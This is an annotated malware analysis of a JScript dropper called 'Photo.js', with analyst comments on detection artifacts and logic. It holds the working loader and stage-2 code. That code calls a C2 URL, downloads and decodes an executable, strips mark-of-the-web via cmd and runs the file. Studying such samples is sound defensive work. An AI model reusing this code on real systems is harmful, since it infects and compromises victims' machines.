MalwareBreakdown

Photo.js deobfuscated and commented

Jun 5th, 2017
  // Stage-1 loader of the sample this page calls 'Photo.js', as deobfuscated by the analyst.
  // It uses ActiveXObject and the WScript object, so it is a Windows Script Host script and
  // only runs under wscript.exe / cscript.exe; all file access goes through the
  // Scripting.FileSystemObject COM object created on the next line. The bulk of the file
  // (the large block comment further down) is the stage-2 payload, which this loader
  // later uncomments from its own source text and passes to eval().
  1. // A pointer to a new object created under the Scripting application
  2. var fsObject = new ActiveXObject('Scripting.FileSystemObject');
  3.  
  4. // Test if the file 'bfffdebdedceea.txt' exists using the FileExists() method.
  5.     // True: the file exists and the caller has the proper permissions.
  6.     // False: path is null, invalid path, or zero-length string. Also if the permissions are incorrect, no error is thrown and result is always false.
  // NOTE(review): FileExists() is given a bare file name, which FSO resolves against the
  // process's current directory, while DeleteFile() below builds its path from tempFolder.
  // tempFolder is declared with 'var' only after this block, so it is hoisted but still
  // undefined here and the delete path reads 'undefined/bfffdebdedceea.txt'. The same
  // mismatch repeats two statements down. Unless such a file sits in the working directory
  // this block never executes, so treat it as noise rather than as part of the logic.
  7. if(fsObject.FileExists('bfffdebdedceea.txt')){
  8.     fsObject.DeleteFile(tempFolder + '/' + 'bfffdebdedceea.txt');
  // The echoed string appears nowhere else in the script; the three echoes look like filler.
  // Note the spelling 'Wscript' here versus 'WScript' used later in the file — confirm how the
  // host resolves it before relying on these lines for anything.
  9.     Wscript.echo('cbeaedaefdccdbcf');
  10.    
  11.     Wscript.echo('cbeaedaefdccdbcf');
  12.        
  13.     Wscript.echo('cbeaedaefdccdbcf');
  14. }
  15.  
  16. if(fsObject.FileExists('bfffdebdedceeaas.txt'))fsObject.DeleteFile(tempFolder + '/' + 'bfffdebdedceeaas.txt');
  17.  
  18. // The GetSpecialFolder() method is called to return a specific special folder object; 2 is the FSO TemporaryFolder constant (the user's temp directory).   
  // Every marker file this loader reads, writes or renames lives in this folder, so the
  // file names that appear later in the script are the most direct host artifacts for
  // detection of this loader.
  19. var tempFolder = fsObject.GetSpecialFolder(2);
  20.  
  21.  
  22.     /*  This section of code is ultimately evaluated by this JS program. The contents of this file are read into the program, the comments are removed, and then the contents are called with eval().
  23.  
  24.     var exeString = '';
  25.     var hexBuffer = [];
  26.     var newStr;
  27.  
  28.     function hexConvertToStrings(bedefccdeacfbccafab) {
  29.         var ffbcaececdda = bedefccdeacfbccafab.toString();
  30.         var da = '';
  31.         for (var ebffaedbdafcbf = 0; ebffaedbdafcbf < ffbcaececdda.length; ebffaedbdafcbf += 2)
  32.             da += String.fromCharCode(parseInt(ffbcaececdda.substr(ebffaedbdafcbf, 2), 16));
  33.         return da;
  34.     }
  35.  
  36.     function isANumber(inputNumber) {
  37.         // This logic is checking for two things:
  38.             // inverse of is not-a-number (aka is a number) AND if the number is finite.
  39.         return !isNaN(parseFloat(inputNumber)) && isFinite(inputNumber);
  40.     }
  41.  
  42.     function aaffacfdceaf(fdacdaffdacdaf,ccdacbcdbd){
  43.         for(i=ccdacbcdbd;i>0;i--){
  44.             fdacdaffdacdaf = fdacdaffdacdaf - 1;
  45.            
  46.             if(fdacdaffdacdaf<0)
  47.                 fdacdaffdacdaf = 9;
  48.            
  49.         }
  50.  
  51.         return fdacdaffdacdaf;
  52.     }
  53.  
  54.     function bdfebaadddbdfade(sstrstrtfdacdafr,ebbfbddcdb){
  55.         var counter = sstrstrtfdacdafr.length;     
  56.         var adafefddcbcaed = '';
  57.         var ceedeebde = 0;
  58.        
  59.         for(var bdcfebcc=0;bdcfebcc<counter;bdcfebcc++){
  60.             if(ceedeebde>10)
  61.                 ceedeebde=0;
  62.            
  63.             if(isANumber(sstrstrtfdacdafr.charAt(bdcfebcc))){
  64.                 adafefddcbcaed = adafefddcbcaed + aaffacfdceaf(sstrstrtfdacdafr.charAt(bdcfebcc),ebbfbddcdb[ceedeebde]);
  65.                 ceedeebde++;
  66.             }else{
  67.                 adafefddcbcaed = adafefddcbcaed + sstrstrtfdacdafr.charAt(bdcfebcc);
  68.             }
  69.         }
  70.  
  71.         return adafefddcbcaed;
  72.     }
  73.  
  74.  
  75.     function descrambler(inputString,fecdfaaeadefcb){
  76.         var efbcfbbbccafbfb = "D6duab_xJNfST(zLh$^ke,1Mj&+KsHU2;0WYcrE7%IOGnt*8FRmX!q5:A-oiPy)QBClwp9v4V@3gZ.";
  77.         var adffafadafeedcaaa = "";
  78.         var bcbcddacabdbbad = efbcfbbbccafbfb.length-1;
  79.         var size = inputString.length;
  80.  
  81.         for(var cafbbfbcc = 0; cafbbfbcc<size ; cafbbfbcc++){          
  82.             var deafbfabb = efbcfbbbccafbfb.indexOf(inputString.charAt(cafbbfbcc));
  83.             var bdcaddfedb = deafbfabb - fecdfaaeadefcb;
  84.            
  85.             if(bdcaddfedb<0){
  86.                 bdcaddfedb = bcbcddacabdbbad - Math.abs(bdcaddfedb);
  87.                 var ccdacbcdbd = bcbcddacabdbbad - 1;  
  88.                 if(bdcaddfedb==ccdacbcdbd)
  89.                     bdcaddfedb = bdcaddfedb + fecdfaaeadefcb;
  90.             }
  91.            
  92.             adffafadafeedcaaa = adffafadafeedcaaa + efbcfbbbccafbfb.charAt(bdcaddfedb);
  93.         }
  94.        
  95.         return hexConvertToStrings(adffafadafeedcaaa);
  96.     }
  97.  
  98.     // ActiveXObject('Scripting.FileSystemObject')
  99.     var fsObject = new ActiveXObject(descrambler("%gdg%;dv%W%Vdvd7d%;7dddvdld:%g%v%g%Vd:d6dRd;d-d:dg%V",1));
  100.     var tempFolder = fsObject.GetSpecialFolder(2);
  101.  
  102.     // ActiveXObject('WScript.Shell')
  103.     var wScriptObject = new ActiveXObject(descrambler(':%:gdg%;dv%W%V;7%gdFd:dldl',1));
  104.     // SpecialFolders('Desktop')
  105.     // This returns the shortcuts on the current user's desktop.
  106.     var placeholder = wScriptObject.SpecialFolders(descrambler('VVd:%gdC%VdR%W',1));
  107.     var deskShortcuts = placeholder;
  108.  
  109.     // ActiveXObject('Scripting.FileSystemObject')
  110.     var fsObject = new ActiveXObject(descrambler("%gdg%;dv%W%Vdvd7d%;7dddvdld:%g%v%g%Vd:d6dRd;d-d:dg%V",1));    
  111.  
  112.     // ActiveXObject('MSXML2.XMLHTTP.3.0')
  113.     var XMLHttpObject = new ActiveXObject(descrambler('V6%g%Fd6dlg;;7:FV6VlVF:V:V:W;7gg;7gW',1));
  114.  
  115.     var iter = 0;
  116.     var index = 0;
  117.  
  118.     // linsssee is 'http://sobberinfo[.]com/gate.php'
  119.     var link = ['dF%V%V%Wg-;R;R%gdRd;d;d:%;dvd7dddR;7dgdRd6;Rd%dM%Vd:;7%WdF%W'];
  120.  
  121.     while(true){
  122.         iter++;
  123.         if(link[index] == undefined)
  124.             index = 0;
  125.  
  126.         try {
  127.             // XMLHttpObject.open("GET", "http://sobberinfo[.]com/gate.php?ff"+<number>, async=false)
  128.             XMLHttpObject.open(descrambler('V%V::V',1), descrambler(link[index],1)+'?ff'+iter, false);
  129.             XMLHttpObject.send();
  130.         } catch(e) {
  131.             index++;
  132.             WScript.Sleep(1000);
  133.             continue;
  134.         }
  135.  
  136.         var responseIndexTriplePipe = XMLHttpObject.responseText.indexOf('|||');
  137.  
  138.         if( responseIndexTriplePipe == -1 ){   
  139.             index++;
  140.             WScript.Sleep(1000);
  141.             continue;  
  142.         }      
  143.  
  144.         if(XMLHttpObject.Status == 200)break;
  145.     }
  146.  
  147.     // This returns the DOMString object containing the response as text.
  148.     var responseContent = XMLHttpObject.responseText;
  149.    
  150.     // responseContent = responseContent.split('|||')
  151.     responseContent = responseContent.split(descrambler('%l%l%l',1));
  152.    
  153.     // numberList = responseContent[0].split(,)
  154.     // The numberList is provided in the first part of the response containing the payload; which was separated by three pipe characters.
  155.     var numberList = responseContent[0].split(descrambler(';l',1));
  156.      
  157.     // responseContent[1] is the large hex content of the '36d4.exe' payload.
  158.     exeString = bdfebaadddbdfade(responseContent[1],numberList);
  159.    
  160.     // ActiveXObject('Scripting.FileSystemObject')
  161.     var fsObjectooo = new ActiveXObject(descrambler("%gdg%;dv%W%Vdvd7d%;7dddvdld:%g%v%g%Vd:d6dRd;d-d:dg%V",1));
  162.  
  163.     var  hexBuffer = [];
  164.  
  165.     for(var bdcfebcc=0; bdcfebcc< exeString.length-1; bdcfebcc+=2){
  166.         hexBuffer.push(parseInt(exeString.substr(bdcfebcc, 2), 16));
  167.     }
  168.  
  169.     // This will convert the buffer into a string.
  170.     newStr = String.fromCharCode.apply(String, hexBuffer);
  171.  
  172.     function fbbecbbbeadeadefbba(inputString){
  173.         var stringHolder = inputString;
  174.         // ActiveXObject('ADODB.Stream')
  175.         var edfabefbaadbfc = new ActiveXObject(descrambler('VMVVVRVVV;;7:g%V%;d:dMd6',1));
  176.         // Set the type value to the default of text.
  177.         edfabefbaadbfc.Type = 2;
  178.         // Set the character set to ISO-8859-1.
  179.         edfabefbaadbfc.Charset = 'ISO-8859-1';
  180.         // Opens a stream object.
  181.         edfabefbaadbfc.Open();
  182.         // Writes the input buffer contents to the stream object.
  183.         edfabefbaadbfc.WriteText(stringHolder);
  184.         // Saves the binary contents of the file from the stream object.
  185.         // A shortcut on the desktop for '36d4.exe'
  186.         edfabefbaadbfc.SaveToFile(deskShortcuts + '/' +descrambler('gggddVgV;7d:%Fd:',1), 2);
  187.         // Closes the stream object.
  188.         edfabefbaadbfc.Close();
  189.     }
  190.     fbbecbbbeadeadefbba(newStr);
  191.  
  192.     // ActiveXObject('Scripting.FileSystemObject')
  193.     var fsObject = new ActiveXObject(descrambler("%gdg%;dv%W%Vdvd7d%;7dddvdld:%g%v%g%Vd:d6dRd;d-d:dg%V",1));
  194.      
  195.     var fileFound = fsObject.FileExists(tempFolder + '/' +'fbafcfadbceffc.txt');
  196.        
  197.     // ActiveXObject('WScript.Shell')
  198.     // // A pointer to a new shell object created under the WScript application
  199.     var wShellObject = new ActiveXObject(descrambler(':%:gdg%;dv%W%V;7%gdFd:dldl',1));
  200.  
  201.     // Run('cmd.exe /c echo [ZoneTransfer]>' + ceaebecfbabcd + '\\36d4.exe:Zone.Identifier')   
  202.     wShellObject.Run(descrambler('dgd6dV;7d:%Fd:;W;Rdg;W',1) + descrambler(';;d:dgdFdR;W:C:-dRd7d::V%;dMd7%gddd:%;:6g7;W',1)+ ceaebecfbabcd +'\\'+ descrambler('gggddVgV;7d:%Fd:',1)+descrambler('g-:-dRd7d:;7VvdVd:d7%Vdvdddvd:%;;;',1),0,false);
  203.  
  204.     // Run('cmd.exe /c echo ZoneId=2>>' + deskShortcuts + '\\36d4.exe:Zone.Identifier')
  205.     wShellObject.Run(descrambler('dgd6dV;7d:%Fd:;W;Rdg;W',1) + descrambler(';;d:dgdFdR;W:-dRd7d:VvdVg6g;g7g7;W',1)+ deskShortcuts +'\\'+ descrambler('gggddVgV;7d:%Fd:',1)+descrambler('g-:-dRd7d:;7VvdVd:d7%Vdvdddvd:%;;;',1),0,false);
  206.    
  207.     // Run('cmd.exe /c' + deskShortcuts + '\\36d4.exe')
  208.     wShellObject.Run(descrambler('dgd6dV;7d:%Fd:;W;Rdg;W',1)+ deskShortcuts +'\\'+ descrambler('gggddVgV;7d:%Fd:',1),0,false);
  209.        
  210.     WScript.echo('Runtime Error 0x48940 (.QBT) Library not located on the system, please use x64 system.');
  211.  
  212.     // Deletion of some files.
  213.     fsObject.DeleteFile(tempFolder + '/' +'febdbaabfer.txt');
  214.     if(fileFound)
  215.         fsObject.DeleteFile(tempFolder + '/' +'fbafcfadbceffc.txt');   
  216.        
  217.     WScript.Quit();
  218.        
  219.     */
  220.    
  // readFile(input): returns the complete text of the file at path 'input' via the
  // FileSystemObject TextStream API. In this script it is called exactly once, with
  // WScript.ScriptFullName — the loader reads its own source so that the block comment
  // holding the stage-2 payload can be stripped and handed to eval() further down.
  // There is no error handling: a failed OpenTextFile() throws, and a failure inside
  // ReadAll() would leave the stream unclosed.
  221. function readFile(input){  
  222.     var fsObject = new ActiveXObject('Scripting.FileSystemObject');
  223.    
       // 'tempVar' and 'inputFile' are both plain aliases of 'input'; the indirection does nothing.
  224.     var tempVar = input;
  225.    
  226.     var inputFile = tempVar;
  227.  
  228.     // The OpenTextFile() method call is to open a specific file for reading/appending. The file option specified is read-only (1 = ForReading).
  229.     // The returned object is a TextStream.
  230.     var fileReadStream = fsObject.OpenTextFile(inputFile, 1);
  231.    
       // ReadAll() returns the whole file as one string, block comment included.
  232.     var fileContents = fileReadStream.ReadAll();
  233.            
  234.     fileReadStream.Close();
  235.    
  236.     return fileContents;   
  237. }
  238.  
  239.    
  // Execution counter persisted as 'febdbaabfer.txt' in the temp folder. The loader
  // increments it on every pass and only assembles the real payload when the count
  // reaches 5. Because the last statement of this file is eval() of the file's own source,
  // the passes are nested re-executions inside a single launch rather than five separate
  // runs (see the note at the end of the file).
  240. var counter = 0;
  241. var fileFound = fsObject.FileExists(tempFolder + '/' + 'febdbaabfer.txt');
  242. if(fileFound == true){
  243.     // The OpenTextFile() method call is to open a specific file for reading/appending. The file option specified is read-only and the file format is treated as Unicode.
  244.     // The returned object is a TextStream.
       // NOTE(review): the analyst reads the third argument (1) as Unicode; the documented
       // Tristate values are -1 for Unicode and 0 for ASCII, so how the host treats 1 is worth
       // confirming. For the counter logic only consistency matters, and the same value is used
       // for the write below.
  245.     var fileReadStream = fsObject.OpenTextFile(tempFolder + '/' + 'febdbaabfer.txt', 1,1);
  246.    
  247.     // The contents of the file is a numerical value.
  248.     counter = fileReadStream.ReadAll();
  249.     fileReadStream.Close();
  250. }
  251.  
  // parseInt() without a radix; 'counter' is either the number 0 or the text read from the
  // marker file. A non-numeric marker yields NaN, and neither of the '== 4' / '== 5'
  // branches below would ever fire.
  252. counter = parseInt(counter) +1;
  253.  
  254. // Check if the file exists, and if it does then deletes the file.
  // Same bare-name versus temp-folder-path mismatch as at the top of the file: the check
  // looks in the current directory, the delete targets the temp folder.
  255. if(fsObject.FileExists('bfffdebdedcee3.txt'))
  256.     fsObject.DeleteFile(tempFolder + '/' + 'bfffdebdedcee3.txt');
  257.  
  258. // The file is opened for writing (indicated by 2 = ForWriting, which truncates) and in Unicode format.  
  259. fileReadStream = fsObject.OpenTextFile(tempFolder + '/' + 'febdbaabfer.txt', 2,1);
  260.  
  261. // The WriteLine() method call writes the string to the file followed by a newline.
  262. fileReadStream.WriteLine(counter);
  263. fileReadStream.Close();
  264.    
  // The loader reads its own file. This makes the script self-referential: any change to
  // this file, comments included, changes the string that eval() receives below, which is
  // why the analyst's annotations are line comments and why a second block-comment opener
  // must not be introduced anywhere above the payload.
  265. var fullPath = WScript.ScriptFullName;
  266. var baccafefbfad = readFile(fullPath);
  267.  
  268. // Check if the file exists, and if it does then deletes the file.
  269. if(fsObject.FileExists('bfffdebdedcee.txt'))
  270.     fsObject.DeleteFile(tempFolder + '/' + 'bfffdebdedcee.txt');
  271.    
  // Fourth pass: a second marker, 'ebceeadfbaa.txt', is written with the counter value. It
  // is renamed on the fifth pass and its presence then gates the first eval() at the bottom.
  272. if(counter==4){
  273.     // The file is opened for writing (indicated by 2) and in Unicode format.
  274.     fileReadStream = fsObject.OpenTextFile(tempFolder + '/' + 'ebceeadfbaa.txt', 2,1);
  275.  
  276.     // Check if the file exists, and if it does then deletes the file. 
  277.     if(fsObject.FileExists('bfffdebdedceea.txt'))
  278.         fsObject.DeleteFile(tempFolder + '/' + 'bfffdebdedceea.txt');
  279.  
  280.     // Write out the counter to the file.  
  281.     fileReadStream.WriteLine(counter);
  282.     fileReadStream.Close();
  283.    
  284. }
  285.  
  // Fifth pass: housekeeping, then the stage-2 payload is carved out of the source text.
  286. if(counter==5){
  287.     // A series of checks for the existence of a file, and then deletes it.
  288.     if(fsObject.FileExists(tempFolder + '/' + 'defbfeccdfc.jpg'))
  289.         fsObject.DeleteFile(tempFolder + '/' + 'defbfeccdfc.jpg');
  290.     // The file is renamed with the MoveFile() method from source (argument 1) to destination (argument 2).
       // MoveFile() raises an error if the source is missing, so this pass depends on the
       // fourth-pass marker having been written.
  291.     fsObject.MoveFile(tempFolder + '/' + 'ebceeadfbaa.txt', tempFolder + '/' + 'fbafcfadbceffc.txt');
       // The next four checks are identical; after the first delete the remaining three are no-ops.
  292.     if(fsObject.FileExists(tempFolder + '/' + 'fffefccf.txt'))
  293.         fsObject.DeleteFile(tempFolder + '/' + 'fffefccf.txt');
  294.     if(fsObject.FileExists(tempFolder + '/' + 'fffefccf.txt'))
  295.         fsObject.DeleteFile(tempFolder + '/' + 'fffefccf.txt');
  296.     if(fsObject.FileExists(tempFolder + '/' + 'fffefccf.txt'))
  297.         fsObject.DeleteFile(tempFolder + '/' + 'fffefccf.txt');
  298.     if(fsObject.FileExists(tempFolder + '/' + 'fffefccf.txt'))
  299.         fsObject.DeleteFile(tempFolder + '/' + 'fffefccf.txt');
  300.     if(fsObject.FileExists('bfffdebdedceea.txt'))
  301.         fsObject.DeleteFile(tempFolder + '/' + 'bfffdebdedceea.txt');
  302.  
  303.     // A series of chain replacements, the string 'deaccffbaa' is replaced by nothing 5 times.
  304.     // The last series of replacements is "/*" and "*/" being replaced with '' to uncomment the code.
       // String.prototype.replace() with a string pattern replaces only the FIRST occurrence,
       // so exactly one comment opener and one closer are removed — the ones that wrap the
       // stage-2 payload above — and at most five copies of the filler token are stripped.
       // The filler token does not appear inside the payload as shown on this page, so those
       // five calls are presumably no-ops for this sample; they may matter for other
       // variants. Script-block logging on the WSH host (where available) is the place to
       // capture the resulting uncommented text.
  305.     baccafefbfad = baccafefbfad.replace('/*','').replace('*/', '').replace('deaccffbaa', '').replace('deaccffbaa', '').replace('deaccffbaa', '').replace('deaccffbaa', '').replace('deaccffbaa', '');
  306. }
  307.  
  308.  
  // 'fbafcfadbceffc.txt' exists only on the fifth pass (created by the MoveFile() above), so
  // the guarded eval() below runs the stripped payload; that payload ends with WScript.Quit(),
  // which is why the unconditional eval() after it is never reached on that pass.
  309. var fileFound = fsObject.FileExists(tempFolder + '/' + 'fbafcfadbceffc.txt');
  310.  
  311. if(fileFound == true){  
  // eval() of file contents — flagged: this is the hand-off to stage 2.
  312.    eval(baccafefbfad);
  313. }
  314.  
  // On passes 1-4 the string is still the unmodified source (block comment intact), so this
  // eval() re-enters the loader from the top: the nested pass reads the marker, increments
  // it and evals again. The chain therefore reaches the fifth pass within one launch, and
  // the stage-2 payload deletes the counter marker before quitting, resetting the state
  // for the next launch. The useful host signal is wscript.exe reading its own script path
  // and writing the small marker files named above in the temp folder; blocking or
  // auditing WSH execution is the practical mitigation.
  315. eval(baccafefbfad);